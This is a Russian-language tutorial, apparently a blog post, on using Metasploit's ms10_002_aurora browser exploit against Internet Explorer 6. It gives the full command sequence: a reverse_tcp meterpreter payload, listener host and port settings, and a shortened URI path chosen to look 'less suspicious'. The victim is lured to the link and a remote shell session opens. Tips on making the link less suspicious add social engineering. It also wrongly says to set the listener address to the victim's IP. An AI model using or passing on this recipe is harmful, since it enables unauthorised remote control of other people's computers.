Aurora

Aurora

Oleg

Aurora-это эксплойт на основе браузера, который означает, что полезная нагрузка вводится через браузер на машине жертвы. Aurora использует дефект повреждения памяти в Internet Explorer 6. Это довольно устарело, но мы делаем здесь детские шаги, и это довольно легко.

Именно этот эксплойт был использован в операции Aurora группой хакеров, которые скомпрометировали большое количество крупных компьютерных систем, включая Adobe. Эта атака началась в середине 2009 года и продолжалась до декабря. Internet Explorer имеет смехотворно длинный список потенциальных уязвимостей, хотя большинство (если не все) из которых были исправлены в сегодняшней версии. У каждого программного обеспечения в какой-то момент будет свой плохой день. Единственный способ избежать последствий-следить за новостями, может быть, просто заглядывать в заголовки и держаться подальше от опасных приложений. Известно, что эксплойты нулевого дня используются хакерами для настройки сетей зомби без того, чтобы (потенциально, тысячи) жертв когда-либо узнали об этом.

IE 6 был выпущен в 2001 году, чтобы выполнить этот хак, вы можете скачать более старую версию IE.

Запустите Metasploit и давайте начнем с выбора aurora:

Use exploit/windows/browser/ms10_002_aurora

Затем установите полезную нагрузку на обратный измеритель.

set payload windows/meterpreter/reverse_tcp

Теперь нам нужно ввести LHost, Lport (для полезной нагрузки) и SrvHost для aurora. LHost и SrvHost должны быть одинаковыми. Вы также можете изменить srvport, но вы можете оставить его на 8080 (по умолчанию), если хотите.

Set LHost 192.168.2.103 Set LPort 4444 Set SrvHost 192.168.2.103

(Используемый IP-адрес-это всего лишь пример, вам нужно заменить его адресом вашей жертвы) У нас также есть возможность изменить uripath. А это что такое? Это работает путем открытия URL-адреса в старом ИЕ6 глючит. Uripath дает нам этот URL-адрес, который при открытии в компьютере нашей жертвы устанавливает соединение через указанные порты с нами, давая нам сеанс meterpreter.

Лучший способ практиковать эти атаки и эксплойты с готовым (и заслуживающим доверия) другом. Вы также можете настроить несколько виртуальных машин в своей собственной системе, но я думаю, что это слишком усложняет ситуацию, плюс большинству средних компьютеров трудно запустить одну виртуальную машину с приличной производительностью. Если у вас есть несколько компьютеров, возможно, ноутбук, вы можете попробовать получить кабель LAN (Ethernet) и соединить их вместе. Опять же, самый простой способ-это две системы с известными IP-адресами, подключенные к интернету.

Мы просто установим uripath на символ косой черты, который позволит metasploit придумать свой собственный URL-адрес, который мы можем использовать. Это должно быть что-то вроде:

http://192.168.2.103:3421

Изменение пути uri на символ косой черты, как показано ниже, дает нам меньший URL-адрес. На самом деле это не имеет значения, но это немного менее подозрительно.

set uripath /

Введите exploit, и наш локальный сервер запустится. То есть, когда жертва открывает URL, который мы им посылаем, она подключает их непосредственно к нашему импровизированному серверу. Он ничего не открывает в браузере жертвы, просто пустая страница, но он устанавливает соединения и дает нам сеанс meterpreter. Миссия выполнена.

Итак, теперь мы знаем еще один эксплойт, еще один способ взлома компьютера нашей жертвы. На самом деле, мы еще даже не поцарапали поверхность. В настоящее время в Metasploit включено более 2500 различных эксплойтов, которые мы можем использовать.

Metasploit-это невероятно мощный инструмент с множеством функций и опций. Лучший способ изучить его - нажать каждую кнопку, чтобы посмотреть, что произойдет. Так что вперед. Исследовать.


До встречи Друг

Report Page